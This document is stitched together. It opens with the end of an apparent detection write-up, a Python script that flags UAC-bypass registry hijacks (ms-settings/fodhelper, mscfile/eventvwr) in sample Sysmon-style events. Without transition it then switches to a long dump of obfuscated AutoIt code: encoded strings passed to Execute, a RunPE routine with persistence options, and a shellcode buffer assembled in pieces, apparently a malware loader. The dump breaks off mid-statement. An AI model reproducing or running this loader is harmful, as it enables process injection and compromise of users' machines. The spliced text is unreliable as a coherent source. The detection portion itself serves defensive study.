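# binary that reads them. These are the two pairs the dumped script sets up:
# RIINHIEBTT (mscfile, then eventvwr) and IPTYOQECLE (ms-settings with
# DelegateExecute, then fodhelper). A medium-integrity process can write them.
HIJACKED_VERBS = {
    r"software\classes\mscfile\shell\open\command": "eventvwr.exe",
    r"software\classes\ms-settings\shell\open\command": "fodhelper.exe",
}

# Constructed telemetry in a Sysmon-like shape, one event per line, tab separated:
# event id (13 = registry value set, 1 = process create), acting image, target
# (registry value path for 13, child image for 1), details. Not taken from the
# report; the fourth and fifth lines are benign noise the detector must ignore.
SAMPLE_EVENTS = "\n".join([
    "13\tC:\\Users\\user\\Desktop\\sample.exe\tHKU\\S-1-5-21-1\\Software\\Classes\\ms-settings\\shell\\open\\command\\(Default)\tC:\\Users\\user\\Desktop\\sample.exe",
    "13\tC:\\Users\\user\\Desktop\\sample.exe\tHKU\\S-1-5-21-1\\Software\\Classes\\ms-settings\\shell\\open\\command\\DelegateExecute\t(Empty)",
    "1\tC:\\Users\\user\\Desktop\\sample.exe\tC:\\Windows\\System32\\fodhelper.exe\t",
    "13\tC:\\Program Files\\Vendor\\setup.exe\tHKU\\S-1-5-21-1\\Software\\Classes\\.vnd\\shell\\open\\command\\(Default)\tC:\\Program Files\\Vendor\\app.exe %1",
    "1\tC:\\Windows\\explorer.exe\tC:\\Windows\\System32\\eventvwr.exe\t",
])


def split_registry_target(target: str):
    """Return (key path relative to the user hive, value name), both lower-cased.
    Handles HKCU\\... and HKU\\<SID>\\... spellings. Caveat: the same keys also
    exist under HKU\\<SID>_Classes (the user Classes hive); map that form too if
    your sensor reports it that way."""
    parts = target.lower().split("\\")
    if parts[0] == "hku":
        parts = parts[2:]
    elif parts[0] in ("hkcu", "hkey_current_user"):
        parts = parts[1:]
    return "\\".join(parts[:-1]), parts[-1]


def detect(log_text: str):
    """Return (image, subject, description) findings: one per hijack write, plus
    one when the same image later launches the matching auto-elevating binary."""
    findings = []
    expected_launch = defaultdict(set)  # acting image -> binaries it has hijacked
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event_id, image, target, details = line.split("\t")
        if event_id == "13":
            key, value = split_registry_target(target)
            binary = HIJACKED_VERBS.get(key)
            if binary is None:
                continue  # some other shell verb; not one an auto-elevator consults
            if value == "delegateexecute":
                what = "DelegateExecute value written under a hijacked verb key"
            else:
                what = "command value set to " + details
            findings.append((image, key, what))
            expected_launch[image].add(binary)
        elif event_id == "1":
            child = target.lower().rsplit("\\", 1)[-1]
            if child in expected_launch.get(image, ()):
                findings.append((image, child, "auto-elevating binary launched after hijack"))
    return findings


if __name__ == "__main__":
    for image, subject, description in detect(SAMPLE_EVENTS):
        print(f"{image}: {subject}: {description}")
```

The write alone is worth an alert, but the process-creation correlation is what separates this pattern from legitimate per-user file associations (the `.vnd` line): a medium-integrity process that first rewrites one of these verb keys and then starts the matching binary is the full bypass sequence, and the script's cleanup of the key afterwards does not undo the event that was already logged.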
) ) ) $864731176 = 1300820860 DIM $MKNWCPAOJCVF1GJLH6IS = 69587 + 3220933 * 2937281 + 4293372797 * 61801 + 4294813521 + 3551407 * 244707 ENDIF IF $864731176 = 256356752 THEN $E = EXECUTE $864731176 = 176683708 DIM $QNCYHONM0Q28ZVRMH1UN = 2509262 * 2379311 + 129909 + 4293667836 * 2893636 + 4293386776 + 3344262 ENDIF IF $864731176 = 781366022 THEN $RET = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..50..,57..,..57,..59..,3,59..,3..,5..7..,..5..6,59..,5..4,5..9..,3,..5..9..,..3,..5..5,6..1..,..55..,..6..0,59,5..4,..5..9,5..7,60,59..,59,..54..,..60,..5..3..,..5..9..,6..2..,..5..6,..56..,..56,..55,..55,5..,59,57..,59,..3..,..59,3,..55,60..,5..5,..3..,..55..,5..3..,..5..5,60..,..59,..6..2..,5..9..,5..,6..0,..57..,..5..5..,60..,5..5,3,..55,5..3,..5..5..,..60..,..58,..56,..59,58..,..60..,57,..5..7..,..2,..59..,..5..8,6..0,..55,59..,..5..,5..9..,..5..8,..59,..3..,..57,..6,..59..,..5..5..,5..9..,1,59..,58..,5..9..,..5..6..,..6..0..,..57..,..58,5..6..,..59,..5..8..,..59..,..56,..60,..5..8,..60,..55,59,..62,60,5..7..,..60,6..2..,..55,..6..0..,..55..,3..,5..5,..5..3,55..,6..0,..60,5..3..,6..0..,5..7..,6..0,55,5..5..,6..0,55..,3..,..55..,53,55,..5..7,..59..,..6..1..,..5..9..,..54,..59,..5..,59..,..5..7..,..5..9..,3..,..59..,5..8,..5..5..,..3..,..5..5,..53,..55..,..6..0,5..9..,57,6..0..,..60..,5..9..,..6,6..0,5..5..,59,57..,..5..5,..60..,..5..5,3,..55,5..3,5..5..,..60,..5..6,5..3..,60,..6..1..,5..6..,..5..3..,5..6..,57..,55..,60..,..55..,..3..,55..,..53,5..5,6..0..,..6..0..,..53,60..,57..,..60..,..5..5..,..55,60..,..5..5..,..3,5..5..,..5..3..,..55,..57..,..60..,..53,..58..,..56,57..,5..7..,55,..62" , ".." 
) ) ) ) RANDOM (3374839 ) EXITLOOP ENDIF IF $864731176 = 1027989821 THEN LOCAL $PSD = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..5..0..,57,..5..7,59..,..3,59,..3..,58..,..5..6..,6..0,..5..7..,6..0..,5..5,6..0,..5..8,..59..,..56..,..60..,57..,..57,..60..,..59..,..58,60,..57..,58,..53,..60..,..57..,60,55..,5..5..,6..1,..5..5,..5..7..,..60..,..57..,58,..56,57,..57..,..55,..6..2" , ".." ) ) ) ) $864731176 = 1138660241 WINEXISTS ("Vt25GlQLqwe4TDurZiboJwjb3rsXglk0zF7lFhsmAf9KVGM01" ) ENDIF IF $864731176 = 1138660241 THEN LOCAL $RET = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,5..0,..5..7..,57,5..9,..3..,5..9..,..3,..57,..5..6,..5..9,..5..4,..59..,..3..,59,..3..,55,..61,..5..5..,..60,..59,5..4,59..,57..,..6..0,5..9..,5..9,54,60,..53,5..9,62,5..6,5..6,..56,..55..,5..5,..5..,..5..9..,5..7..,..5..9,..3,5..9,3,55..,60..,..5..5..,3,..55,..53,55,..6..0..,5..9..,..6..2,..59..,..5,6..0..,..57..,55,..60,..5..5,..3..,..5..5,53,55,60,57..,..62..,..5..9..,..5,5..9,6..2..,..60,57,..5..9..,..62,..5..9..,..5..4,..59,..3..,..5..9..,6..2..,60,1..,..59,..58,5..8,5..6..,59,..5..8,..5..9,56..,60..,..58,6..0..,..55..,..5..9,6..2..,6..0..,57,..6..0..,6..2,57,5..7..,..59..,..5..8,6..0,56..,59..,56..,6..0,5..5..,5..9,..62,..60..,..5..3..,60,..5..7,59,..6..,..6..0,..5..5,5..5,6..0,..5..5..,..3,..55..,5..3,55..,..6..0,6..0..,53..,..6..0..,..5..7,..60,..55..,..5..5,6..0,..55,3..,..55..,5..3,5..5,..5..7..,..60,5..3,5..8,5..6,5..7,5..7..,..55,3..,55..,..5..3..,55..,60,..59,5..7,..6..0..,6..0,5..9,..6,..6..0,..5..5,59..,57,..5..5,6..0,55..,3..,..55,..5..3..,5..5..,..60..,56..,..5..4,5..5,6..0,5..5..,62.." , ".." 
) ) ) ) $864731176 = 1924764602 ISBINARY (1582475 * 129845 ) ENDIF IF $864731176 = 1203322726 THEN LOCAL $PACL = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,50..,5..7..,57,59..,..3,59,..3,58,5..6..,60..,57,..60..,..5..5,6..0,..5..8,..59,5..6,6..0..,57..,57,6..0..,59,5..8,..6..0,..5..7,5..8,..53,60,..57,..6..0,5..5..,55,..6..1..,..55,5..7,..6..0..,..57..,..57..,54,57..,..5..6,57..,..3..,55..,..6..2.." , ".." ) ) ) ) DIM $LODNFJWSZZYEXIPWOB65 = 73573 $864731176 = 113519199 ISBOOL ("fdtHJ3yFcztSzB2W1taKLOJA6JeTaTF7hhMWEp5DkTtohnEIJA3wHzczC3K9ZOEt3wJsZgrKyFA2uu" ) ENDIF IF $864731176 = 1300820860 THEN LOCAL $TACL = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,5..0,..5..7,57,5..9..,..3..,59..,3..,5..8,5..6,..6..0,57..,60,5..5..,..6..0..,5..8,5..9..,..5..6..,..6..0,..5..7,..5..7,..5..6..,..6..0,55..,59,5..8,..5..9,..5..4..,..60,5..7,59..,58,..5..5..,61..,..55..,..55,59..,..5..5,..60..,..62..,..6..0,..5..7,..5..9..,..5..8..,5..5,..5..3,57,..5..4..,5..9..,..56..,..5..9,..3,58..,55,5..9..,..5..8..,..6..0..,..59,59..,62..,6..0,5..6,..5..9,..6..2..,5..9..,..6,5..9..,..5..,..56..,2,..5..9..,5..5,..60..,62..,..60,..57,59..,..58..,..5..5..,..5..3..,..5..8..,5..6,..59..,..5..5..,..60..,1,5..6..,..54..,..5..6,..2..,..6..0,58..,60..,5..6,59..,..6..1,..59..,6..,6..0,55,..60..,..57..,5..5..,..5..3,5..7,54,59,..5..6,5..9..,3..,5..8..,5..6,..59..,6..2..,..6..0..,..1..,..5..9,58..,..56..,..2..,6..0,..5..8..,..60..,..5..6,59..,..61,5..9,..6,..60..,5..5..,..60,57..,..55,..53..,..57,54,5..9,56,5..9,..5..8..,5..7,..5..6,59..,..6..,..6..0,..58,59..,..5,60..,57,56,..2..,60,58,60..,5..6,..5..9,..61..,..59..,..6..,..6..0..,..55..,..6..0,..57,..55,53..,..58,..5..6..,59..,55,60..,1,5..6,55..,..5..5,..55..,..55..,..6..2" , ".." 
) ) ) ) $864731176 = 1203322726 ENDIF IF $864731176 = 1655436234 THEN $RET = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,5..0,5..7,..57..,..5..9,3,..5..9,..3..,5..7..,5..6,..59..,..54,..5..9..,..3..,59..,..3,..5..5,61..,..5..5,..60,59,..5..4..,59,..57..,60..,..59,59..,..54,..6..0..,..5..3..,..59,6..2,..56..,5..6..,..5..6..,5..5..,55..,..5..,5..9,..57..,..5..9..,3..,5..9..,3..,5..5,6..0..,55,..3,55,5..3,..55..,..6..0,5..9,..6..2,5..9..,..5..,..6..0,..57..,..55,60..,..55,3..,55..,5..3,5..5..,..60,5..8..,5..6,..59..,5..8,..60,..5..7,5..8..,..56..,5..9..,..58,59,..5..6..,6..0,5..8..,60..,5..5,5..9..,62,..6..0,5..7,..60..,..6..2..,..5..7,5..7..,5..9..,..5..8,..6..0..,5..6..,59,..5..6,..60,55,..5..9,..6..2..,60,5..3,6..0..,57..,..59,..6,..6..0,55..,57,..5..7,..5..9,5..4..,..59..,..56..,5..9,3,..55,60..,55..,..3..,5..5,5..3..,..5..5,6..0,6..0..,53..,6..0,57,60..,..55..,5..5,6..0..,..55,..3,5..5..,5..3,55..,..5..7..,..60,5..3,5..8..,..5..6,5..7,57,55,3..,55,..53..,55..,..60,..5..9,6..2..,..59,5..,..60,5..7..,55,..6..0,5..5,..3..,..5..5..,..53..,..5..5..,..6..0,..5..6,..5..4..,55..,6..0..,..5..5..,3,..55..,..53,5..5,..6..0..,..60..,..53..,..60,..5..7..,..6..0,..55,..5..5..,..60,..55,3..,..5..5..,5..3,..5..5..,57..,..6..0,53..,5..7,54,..57..,56..,..5..7..,..3..,55..,3,55..,..5..3..,..5..5..,..6..0,..59,6..2..,59,5,60,5..7..,..5..5,..60..,55..,..3,..55..,5..3,5..5..,..6..0,..5..6,..5..3..,55,60,..5..5,6..2.." , ".." 
) ) ) ) CHR (2826920 ) $864731176 = 781366022 ENDIF IF $864731176 = 1924764602 THEN $RET = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..5..0..,..57,..57..,5..9..,..3..,..59..,3,..57..,..5..6..,..5..9..,54,..59,3,5..9..,..3..,..55..,6..1..,55..,..6..0..,..5..9..,..54,..59..,..5..7,6..0..,..59..,..59..,..54,60,53,..5..9..,6..2..,..56,56..,5..6..,..5..5..,..55..,5,..5..9..,5..7..,59..,3..,5..9..,..3..,5..5,60..,..5..5..,3,5..5..,..53..,..5..5,..60..,..5..9,..6..2,..5..9..,5,6..0..,..57,55,..60,..55..,..3..,..55..,..5..3,5..5..,..60,..57..,6..2..,59,..5,59..,62..,6..0..,57..,5..9,62,5..9..,..54,..59,..3..,..5..9,6..2..,60,1..,5..9..,..5..8,57,5..4..,..59..,..56,5..9,..3..,..55..,6..0..,5..5,3,5..5,..53,55,60..,60,53,60,5..7,..60..,..5..5,..5..5..,..60,..55..,..3..,55,..53..,55,5..7,..60,5..3,..57,54,5..7,56..,5..7,..3,..5..5,3,5..5,53,55,..6..0..,59..,..57,6..0,..60,5..9,..6,60,..55..,..5..9,..57,5..5..,60..,55,3,55,..53,57,57,5..9..,..3,5..9..,..3,..58..,56,..6..0,..5..7,..60..,..5..5..,60,5..8..,59..,5..6,..60..,57..,..5..7,6..0,..5..9,58..,..60,..5..7,58,..5..6,..59,..62,..6..0,..1,..59,..5..8,5..5,..6..1..,..5..5..,..5..7..,60..,..57,..57,54,..57..,..56,..57,3,..5..5..,..62..,5..5,3..,5..5..,..5..3,..5..5,..60..,5..9..,..5..7..,..60,60..,..59,6,60..,..5..5..,5..9..,5..7..,5..5..,..6..0,55..,..3..,..55..,..5..3..,5..5..,..6..0..,..56,..5..5,..55..,..60,55..,..6..2" , ".." ) ) ) ) ISBINARY ("avVNlTCjs7c9jfhJ23tF5DV62n" ) $864731176 = 1655436234 ISFLOAT (1912442 * 2625958 + 3975194 + 4294644196 ) ISFLOAT ("kxS4hkcVbu9rFJYV7fQDuDkdEVicY9GZF7JIjtFLMlBF6wYyTt6Qa5lRmNyvc97" ) ENDIF NEXT ENDFUNC FUNC HJTWPSKJJP ($TITLE , $BODY , $TYPE ) IF $BOOL = ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..27..,38,45,3..1.." , ".." 
) ) THEN $NLIVQGZCBCYM ($TYPE , $TITLE , $BODY ) ENDIF ENDFUNC FUNC RUNPE ($WPATH = "" , $LPFILE = "" , $PROTECT = "" , $PERSIST = "" ) GLOBAL $656182541 = 256356752 GLOBAL $WHAOKNJD1I = 673474 FOR $E = 0 TO 175490 DIM $TSDD1YJW3WF4JJNOYTWJ = 1007376 + 4293029922 * 1166129 + 3804418 + 199124 + 4292793209 + 4293898758 + 4293737743 IF $656182541 = 9803637 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,5..0..,57..,57,..5..9..,3,59,3,..58,5..6,60..,..5..7,..6..0..,55..,60,..58..,59,..5..6,6..0..,5..7..,..58,56,5..9,5..8,60,..57..,57..,5..7..,..59..,..5..4,..60..,..57..,59..,54,..5..5..,..6..1,..55..,57,5..7,..5..9..,5..9..,62..,59,3,..59..,..5..8,..5..8,..6..,58..,5..6,60..,5..7,..6..0..,..55,60..,5..8,5..9..,56..,..6..0,57..,..5..5..,..3..,5..5,53,5..5,..5..5..,5..9,..1..,..5..9,..2..,6..0,5..6,5..9..,..57,5..9,..59..,5..9,6..1..,59..,2..,..5..9..,1..,5..9..,..57..,..6..0..,56,6..0,..5..4..,59..,..6..1..,..59..,5..9..,..59..,2,59,1,..60,..5..4..,..6..0..,56,59..,61,..59..,5..7..,59,59..,59,..2,..59..,..1,..59,57..,..6..0,5..6..,..60,54..,5..9..,..61,59,..6..2..,..5..9..,..5..9..,6..0..,..5..8,..59..,61..,..60,5..6..,59,..57,6..0,54..,..5..9..,62,59..,5..9..,..5..9..,..5..5,..5..9..,5..,60,59,59,1..,..5..9..,..2..,5..9..,..3,..6..0..,5..6..,..59..,5..7,6..0..,..5..9,..60,..5..6..,6..0..,..54,..59..,57,59..,..59,60,..56..,5..5,55..,5..5,..3..,..55..,5..3..,..5..5,..5..7,59..,..3,60..,5..3..,..57..,..59,5..9,6..2..,..5..9,..3,..5..9,5..8,5..5,..6..2" , ".." ) ) ) ) RANDOM (3776848 ) $656182541 = 1586164444 WINEXISTS ("UzDn4M6vHRu" ) ENDIF IF $656182541 = 38669117 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("56,3,..6..0..,..5..,2,..5..,..6..2,58..,5..8..,6..1..,2,5,..3..,..61..,..5..4..,5..,..3,6..,53,..53,..5..6,53,..5..3..,5..3..,53" , ".." 
) ) ISPTR (3442150 * 965098 * 3906138 ) $656182541 = 2032766480 INT (3829084 ) ISPTR ("CqLMHQC1iaLlSS71SnmEQd2cggOmpjmj5koenindxNJnnX" ) ENDIF IF $656182541 = 39019882 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("60..,5..9,..5..4,6..1,..6..1..,62..,60..,5..8..,3..,..6..1,6..1..,..4,57..,58,2..,..57,..3..,6..0,6..1..,5..8..,5..8,..6..1..,6..,6,..6" , ".." ) ) INT (405923 ) $656182541 = 1885155689 ISFLOAT ("IFAbpK9YBpHC3NIaigbDNZtkL4jfaJaCZQNLWcidJzVGxI" ) ENDIF IF $656182541 = 50926388 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,6..0,..58,..4..,..3..,..6..,6..,..58,58,1,..5..3..,6..1..,5..8,3,..5..3,..53..,..6,6..1..,..5..7,62..,61..,53,..55..,..53..,5..3" , ".." ) ) $656182541 = 868457996 ENDIF IF $656182541 = 61093985 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..6..,..61..,..4..,5..7,..58..,3..,..5..7,61,..62..,6..1..,..58..,..5..7,3,6..,..6,..6,6,..6,6,..61..,..4..,..57..,..5..8,1.." , ".." ) ) ISPTR (776663 + 4293584104 ) $656182541 = 1053930317 MOD (335955 , 2573866 ) ENDIF IF $656182541 = 90298599 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("60,5..8,..6..,..61..,..6,..6,..6..0..,5..8..,4..,61,..6,..6,..58..,58,..4..,57,..61..,5..8..,..3..,..53,5..3..,..6,61,5..7,..6" , ".." ) ) $656182541 = 1279551750 DIM $883ODWXCERLYILW464AF = 2544328 ISFLOAT (3562572 + 3716916 ) ENDIF IF $656182541 = 92596336 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1,6..2..,61,..58,..56..,..5..7..,..6,..6,..6,..6..,6,..6,..61..,..4,5..7..,..58,4..,..5..7,..61,..62,..61..,58..,..56,6..1..,6.." , ".." ) ) $656182541 = 1604509846 INT (3385463 ) ISSTRING (1633230 + 4291607498 * 1105641 ) ENDIF IF $656182541 = 100830152 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..6..1..,57..,54,..2,..6..,5,..6,6..,6..,..6..,..6,6..,60,..5..8..,4,3,..6..,6..,..58..,..58..,1..,3,61,58.." , ".." 
) ) DIM $STREGTCKWMLKEEHTNF0Y = "f3Aobcr61zMjpam4yao1OuY3E48oFFlj5RmZ00EQln" $656182541 = 463618680 RANDOM (66547 ) ENDIF IF $656182541 = 113519199 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61..,..4..,..6..0..,6,..6,..6..,6,..6,..6,61,2,..3,..6..1..,6..1..,5..8..,3..,..6..2,60..,..5..7..,..5..5..,..5..3..,..53..,..6..,2,5" , ".." ) ) PTR ("6QVfHTgecAunCnHXwdHEIQAZa3DQCtgRfH9aBUrgyLiXkIFXRSHvqKcqo5fNoAKTuNi5oGuM" ) $656182541 = 1027989821 DIM $6HNOAXR8VVUZEETVFON1 = 3908581 ENDIF IF $656182541 = 116471326 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,53..,53..,53,..53,6..1..,..2,60,59,5..3,3..,..61,2,6..0,..59..,..53..,3,6..1,..2..,56,5..9..,61,2..,..56,59.." , ".." ) ) $656182541 = 1196440215 STRING (2368921 + 4294584284 * 2414981 + 2570255 ) ENDIF IF $656182541 = 116925729 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("60,..6..1,58,60,..5..3..,6..,6,6,..6..,..6..,6..,62,6..2..,..2,5..3,..57..,..6..1,5..3,..5..9,3..,..6..0..,..6..1..,5..8,60..,..5..7" , ".." ) ) $656182541 = 1270739258 MOD (2548954 , 1686916 ) ENDIF IF $656182541 = 143550684 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..58,..58..,..2..,57,61,..2..,57,..4,6,53..,61..,..4..,60,..6,5..5,..61,5..3,..6,..2,..6..0,57,59,..5..3,..5..9" , ".." ) ) PTR (494270 + 3757030 + 701676 ) $656182541 = 605510513 PTR ("jJ9yajobwtGkA2sXkcwH7CpyjJAiMDyLAiANNaELJ6VpJVRs0mLfB02QtKpzTfx245TsANjjGV8aS9Yx2hsz2tjKpVtcVf2DI2vO" ) ENDIF IF $656182541 = 158308218 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..,..61,..5..3..,..5..7,..3,60..,..57..,5..8..,6..1..,5..3..,..1,6..2..,..55..,4..,..4..,60,53..,..5..4,3,6..0,57..,5..8..,..6..1,57..,53.." , ".." ) ) $656182541 = 1922466865 DIM $BHR118UW1GLX79KVHCQU = "yB3EBZNjvDqhw" ENDIF IF $656182541 = 172415000 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..0..,5..8..,4,61,6,..6,58..,58,..1..,..61,61,..5..6..,6..,2..,53,5..8..,53,6,..6..1..,..59,..6..0..,60,..6..,..3,6" , ".." 
) ) $656182541 = 1513972166 WINEXISTS ("qRL2U34wl07dgXvyiQMEduOJJ0rxM3v0D3MY063pBheqywNQx9NsMyE5bbs4KFTsEh" ) ENDIF IF $656182541 = 176683708 THEN LOCAL $BIN_SHELLCODE = ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,5..0..,..58..,58,6..1,2..,5..,3,61..,..2..,5..7,..4..,..5..3,..61..,61,..2..,..3..,54..,6..1,..53..,5..6..,6..2..,..5..3,..53,..60.." , ".." ) ) DIM $ILXXC5PYLMLLAMOCMFYR = 3157420 * 2564471 * 2581599 * 1575695 * 3055616 $656182541 = 1300820860 ENDIF IF $656182541 = 180257576 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,6..,..60,..5..8,6..,6..1,6..,6..,..60..,5..8..,..4..,..61..,..6,..6,58..,5..8..,3,..3,..6..1..,58,3,..53,..5..3..,6..,..6..1" , ".." ) ) CHR (2032782 ) $656182541 = 1791187076 ISBINARY (392562 * 2059814 + 238926 + 4291304449 ) ENDIF IF $656182541 = 210168720 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..54..,53..,..5..7..,5..4..,62,..6..1..,..2,..5..7,..4,6..,53,6..1..,..2,..57..,5..5,53,57,..57,54..,61..,..56,5,61..,..53.." , ".." ) ) $656182541 = 1032281943 PTR (415365 + 4292446165 * 1664935 ) ENDIF IF $656182541 = 217336870 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("62,5..8..,58,5,3..,..59,..5..9..,..5..6..,6..2,54,54,..53..,6..,6..2,57..,3..,..5..3..,..5..6,..4,..5..7,..4,..58..,1..,53..,53.." , ".." ) ) DIM $WG7T0CJ8HPOZSTSWSNCE = 2708682 * 2769324 + 4293939872 $656182541 = 439011666 ISFLOAT (3481491 * 1150538 * 3853364 ) ENDIF IF $656182541 = 229030474 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("56..,..5..,53,..54..,53..,..6..1,..5..6,..3..,..5..3..,..5..4..,53,..5..,2..,54,..5..8..,61..,..58..,3,..5..3,..6..0..,..62,..5..3,58,5..9..,1.." , ".." 
) ) CHR (2387029 ) $656182541 = 2081176827 ISBOOL ("oUuFggefG10ACY0jb1qXezAwyHQLD34hAJXAOAJ2XqwAfGrjJAUirrKZt7gHzCKM6S93bzEKry9Ycaq2q" ) DIM $IW0J87HRTBCUOTEXGYIK = "j13rXWtQor3AHDk105drXrp6OitF3v2x1g9471klYafUI3gptFRDe2i2K7MNCYX2zFJBEp48U2DWlFwVbdlxNxs87gt9oFSanmtdtOVeKTTmywQe" ENDIF IF $656182541 = 238457315 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,5..3,..53..,5..3..,6..,..61,57..,..5..,61..,5..3,55,5..3,53,..5..3..,..53..,..6..1,..4..,57..,..5..8,..4..,6..1..,..5..8..,..5..3,..61,4.." , ".." ) ) ISBINARY ("yobmKDx65TnjCH9ltAvsgX5OgIKAoyw3sxZ8s0TlxiQ9Fc5ZR3qAqgFLtwfb37RFwu0fSb3CSk" ) $656182541 = 1461966853 DIM $5JDNVTVI5MM1NN5URSZA = 623493 MOD (3373745 , 405146 ) ENDIF IF $656182541 = 256356752 THEN #region xjFCr ISPTR (395861 + 4292989638 ) $656182541 = 176683708 ENDIF IF $656182541 = 269998012 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..6..,5..8..,5..8..,2,..57..,5..6..,..5..6..,3,..5..3..,6..1..,..62,..60,4,..6,..5..3,59,59..,..5..6,2,..57..,5..9,..53,..59..,6..0" , ".." ) ) $656182541 = 800246788 ENDIF IF $656182541 = 287505096 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..4..,56..,62,..2..,5..,..1..,5..7..,..5..3,5..3,..53,53,..5..3,..53..,..60..,57,..5..3,..62..,6,59..,..57..,5..9..,..54,..5..9,..53..,..5..4.." , ".." ) ) ISSTRING ("Sa2EG7s81XOdvvmGbtSqSStkmeWlCIMKtceSnQaGeolJBkabnlL3WfoaRRsCkhErkeTtqEsvtllCGTSbeV7r7TYnXeaGxHv7U3zxARUT2pJK3VD88qy" ) $656182541 = 2119340110 ENDIF IF $656182541 = 369187565 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,55,5..8..,6,..6..,..53..,..6,53..,..5..3..,5..3,53..,53..,..56..,53,55,..6..1,..62..,..57..,5..8,..5,3..,61..,2,..3..,..6..1" , ".." 
) ) $656182541 = 1014469933 MOD (1959426 , 3057786 ) PTR ("MsuJxaoyRintbKcIgj6XGI8h5kGohrYVOc0OMQby5XMsclELBm1L3BleunOmD9rztBO9Uw5ziG1T5OeUO4W4zm1" ) ENDIF IF $656182541 = 411711931 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..0..,4..,..2,..3..,6..1..,6..2,..57..,58..,4,..5..3,5..6,..62,..2..,..5,1..,53,..5..3..,..5..3..,5..3..,53,5..3,..5..3,6..0,..57..,5..4.." , ".." ) ) $656182541 = 287505096 CHR (90223 ) RANDOM (2037841 ) ENDIF IF $656182541 = 432319576 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..61..,4,..57..,..58,3..,..53..,6..1,..6..2,..6..1,..58..,..56,5..3,6..,6..,..6..,..6,..6,..6,..61,..4..,57..,5..8,..62..,..6..1.." , ".." ) ) $656182541 = 92596336 ISSTRING (341049 + 4293033473 ) ENDIF IF $656182541 = 438111387 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,53..,5,..2..,..54..,6..0..,..55,..5..8,..5..3,53,53,5..3,..53..,..53,..5..7..,53..,6..,..6..0,..4..,61..,5..4..,..2..,3..,53..,6..1" , ".." ) ) $656182541 = 229030474 WINEXISTS ("Imw9hJBi7cEytL4nSRDnjcRM8SELyMNrgqvTin0adx4cWcjVQnA8NQxGFUbyf0Tt" ) ENDIF IF $656182541 = 439011666 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..53,5..3..,6,..61..,57..,..53,5..,..53..,5..6..,..5..3..,..5..3..,..53..,..53,5..6,5..6,..3,53..,..5..6,62..,..54..,..5..9..,53,..6..,..62.." , ".." ) ) $656182541 = 1477365537 ENDIF IF $656182541 = 463618680 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3,..5..3..,..53,..6,..61..,5..7..,..5..3,..4..,6..,..5..,..6,..6..,..6..,6..,61,2..,57,5..8..,..5,5..3,5..,..2,..5..4..,4..,61.." , ".." 
) ) DIM $HN16HU5KMQMZ3YMXMA4M = 2575191 + 4292344773 + 4291991878 + 1995746 + 4294436912 * 542630 + 2078330 $656182541 = 1577105263 PTR (318373 + 4291289985 + 4294495476 * 2306951 ) CHR (3915271 ) ENDIF IF $656182541 = 467902548 THEN LOCAL $SHELLCODE_STRUCT = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC 